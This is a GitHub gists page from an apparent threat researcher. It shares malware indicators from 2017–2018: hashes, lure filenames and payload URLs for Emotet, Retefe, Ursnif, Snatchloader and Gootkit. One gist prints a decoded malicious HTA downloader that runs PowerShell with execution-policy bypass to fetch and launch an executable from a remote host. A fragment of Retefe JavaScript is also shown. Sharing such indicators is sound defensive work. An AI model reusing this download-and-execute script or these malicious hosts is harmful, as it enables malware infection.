Skip to content

Instantly share code, notes, and snippets.

View Blevene's full-sized avatar

Blevene Blevene

36 followers · 5 following
  • Google
View GitHub Profile
@Blevene
Blevene / Filenames
Created November 28, 2017 16:52
Emotet DE Targets: 11/28/2017
Informationen # 558760280928.doc
Informationen # 8104038723.doc
Invoice #38608290.doc
Invoice #639002322639.doc
Rechnung # 3310283.doc
Rechnung # 640507209.doc
Rechnung # 72120749699.doc
Rechnung # 953444866.doc
Rechnungs-Details # 4168802.doc
Rechnungs-Details # 54430860.doc
@Blevene
Blevene / Retefe Components
Created November 29, 2017 19:13
Retefe - e2494fc7eda73ac116a9a07aced0bab23efc6d494dd3f024e45f048b339f7860
//JS Component
(function(e, r) {
"object" == typeof exports ? module.exports = r() : "function" == typeof define && define.amd ? define(r) : e.RYULJ = r()
})(this, function() {
"use strict";
var e = 14,
r = 8,
n = !1,
f = function(e) {
try {
@Blevene
Blevene / Retefe_Hashes_And_HTTP_URIs
Created November 29, 2017 22:02
Retefe Campaigns
host,method,url,user_agent,sha256,
pamplonarecados.com,GET,/pbuxegx.exe,,c9390e9f53c2a05c3cf7b84c1ee80acb8306be64b5e5e5544913ac298a1aa5db,
pamplonarecados.com,GET,/pbuxegx.exe,,05f298006d2bf23b3ebe8bf0e4bf1431602d96f5170efa0e0d983cac0d7f42b6,
pamplonarecados.com,GET,/pbuxegx.exe,,dbcdbe148ba66056fed2349138b849643cb35fd9c8424febfbc473d22418ccf2,
pamplonarecados.com,GET,/pbuxegx.exe,,648bef8d6abd544c17fcc1275a6f84686296ee9001b55bf64a3dc8971cf0f3f9,
pamplonarecados.com,GET,/pbuxegx.exe,,2ab4550f7793e53682499e852f1c043f70eaac909c30ced4d6263bb193db0ddb,
pamplonarecados.com,GET,/pbuxegx.exe,,405ec5019db005dfc205e6bab8820d43073694943396305e923f62afde0197b7,
pamplonarecados.com,GET,/pbuxegx.exe,,f19f50619761c2f712ad26c870eefd62e1a9b054d856909c8b12d04eaf7ec939,
pamplonarecados.com,GET,/pbuxegx.exe,,1125356ffdc01a4964e1504d034b3bbdb6df75fb3848fe2c72e579a7c9458743,
pamplonarecados.com,GET,/pbuxegx.exe,,93a4881c4a3c76e2afbd43b08a7a086bb03ccab717cb82e2ef9a09447624c3b2,
@Blevene
Blevene / gist:e601eaa3dc05c4d12b53eaf7b96aeba5
Created December 4, 2017 20:16
Ursnif/Gozi/ISFB = 12/4/2017
Filename: request.doc
Sha256
84a7ddaad12698d9b5b2f0eef0f17f42b762dac78b77a86a994a66be2f1f1ef5
9d1b9f99302ab34a0b468b52317d208dfc9d91e10ecb1d079d00c3367a9666ce
503b3ba8ae3464e6735d305f5a5fc82479fe5b961d348800d100ec911f90b208
a05c5dd59204fb505c2b4b2911d9cec4bd00337d41caec19dccdeffb58c3d756
c191965ee51c04073d47e4c5b349bf69cf33c083cc641b9f92b293ae9ae2628d
6e6ffedeb7b0e7de8a3e85ed00e8f84e61356935b1b637b4711ae691ce496490
b891b48ad2e98dbb409e4d1f95a40b30635ae528fa7076a5cb76beacaf78da05
@Blevene
Blevene / Snatchloader Hashes
Created December 11, 2017 15:24
Snatchloader
d38945a93a926169cbe878afa6b292a5b52c570b61dc096725a0ddb8fdd5209e
0b718516dcd50a092663c9cd6f7774408cdaaf2bf55cddf1be7a69ff83b50228
847e9993ee3dbfd6a1eadb5addf82169ec8a2c8ee45fd4811950fb5a4be849db
b9cde665debef868eb0d8dcb156e57233e0d93bfab3380ed6c9564023ff9c3c5
e2e8dc489df96d8619936c9c7ad366d7639cc9e4229e11cf1804ff8aeffa8d2f
11602f3e29f3ec67e292fb84091e512ade674f5f6b71c970f70145ad16127ffa
fe93335975f3fe88e221e68e89cfb60a1e59b6b9cbde919a8b4676dd12db2934
@Blevene
Blevene / Hahes
Created December 14, 2017 14:15
".styx" hunt for Demonslay335
5e7d11d6bd11b09c4cc0c4ba54ebea19dcc06ae585d0508d3d8dba251075f4c6
bf01d97d76a6bb8f3cfbf4a697403f4b686d43fabb429a7bf9427aa70371df78
ba9b26cc08591655878f90c3d8c9e346680e80a40a076efa886d18926eae2293
6a637e90e0673ee6090cc4fb47d82ab87ae7d26ffcff7a7dcafd4da167aea8bc
488a8bc75fd39460bf54dcf904c90d67c94fa1bd38b0ee729b527a062f6ddf0e
@Blevene
Blevene / gist:ffc1bee1dd203e3d334f829a41bf05ac
Created December 19, 2017 21:41
Possible signed Teamviewer Backconnect... thing
Ref (thanks Matt Mesa): https://vms.drweb.com/virus/?_is=1&i=8161714
7dc273a5328ec74392513bd7cc2849d1dc2bd5c83ff035612503aceb5a12ca72
9f5566b23d96b422921dec14952e64e583789757d7f93c7d453b2f5c5508dc2d
4ee7e9cc367d4cf8bcb568ab14d46a35bbf433b29d8686ee977692ab98bf8a72
48aab1c29b6113cf3cd1544188eccade9ae82e330bfc8803876fe64339425b3a
f2814dc63fc8b79e97046781e3e9efb4b653478802ab91ca45c4f6dd25728c66
06a0029bb4a706f03d1626ad79d919f32cf0529e83aa1d9d24d9a4639ec61d49
3278637ee693d3c9eefb6bc0b62b567f9f5f01a305ca3567d51f5f129a2e4e94
8159394c0ed15bc30b6da648dab3c3dcc5f9a62c830b4e2e98c9d29493b569a9
fa0e3c6c4da0ecc370918999a001276113773fafd0486b65b6a07175b00f2105
@Blevene
Blevene / Retefe Dropper
Created January 8, 2018 14:34
Retefe Campaign January 8th, 2018
Binary:
25a923f213098d4878858d4dea40a01262fff3029d5ac24d0f5b064b8999a853
Downloader Locations (From Powershell):
ahkorea.eu
compters.net
concretebirdbathmolds.net
concretemoldcompanies.com
eubieartmedia.com
@Blevene
Blevene / bomberc
Created March 2, 2018 12:10
Decoded downloader component from d8ecb55b823b87a06eb8fc524baff969974a092385ac09bdb02537202380375c
<script>
var diskomagana = ActiveXObject;
var termianxala = new diskomagana('WScript.Shell');
var lopomeriara = (decodeURIComponent("p o w e r s h e l l")).replace(/ /g,'') + ' -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile(\'http://jnossidjfnweqrfew.com/NOB/bomberc.class\', $env:APPDATA + \'\\\\fb1b1d10.exe\'); Start-Process $env:APPDATA\'\\\\fb1b1d10.exe\'; (New-Object System.Net.WebClient).DownloadString(\'http://jnossidjfnweqrfew.com/OU/freddie.php?l=bomberc\'); ;'.replace(//g,'');
setTimeout(function(){window.close()},16180);
setTimeout(function(){termianxala.run(lopomeriara,0)})
</script>
@Blevene
Blevene / Gootkit
Created March 13, 2018 14:27
Gootkit: 3/13/2018
e4ec1c45173db4a6c9a243c859f21b5a72b43bcdd455e18928292e2682275399
6e5c55c8b6601081fa6fbc4e4cb64b9dba0fdcf2b432c104dfdb7157dd5a7133
d7d4e15c42f830f6e6894dd2fb4ebc8f8df65f492048e67ad7bda1949271fad1
217201028cfad66ea193105e7a7d6bb0a0d9b536d8cf6093bc45c7c328d63ac7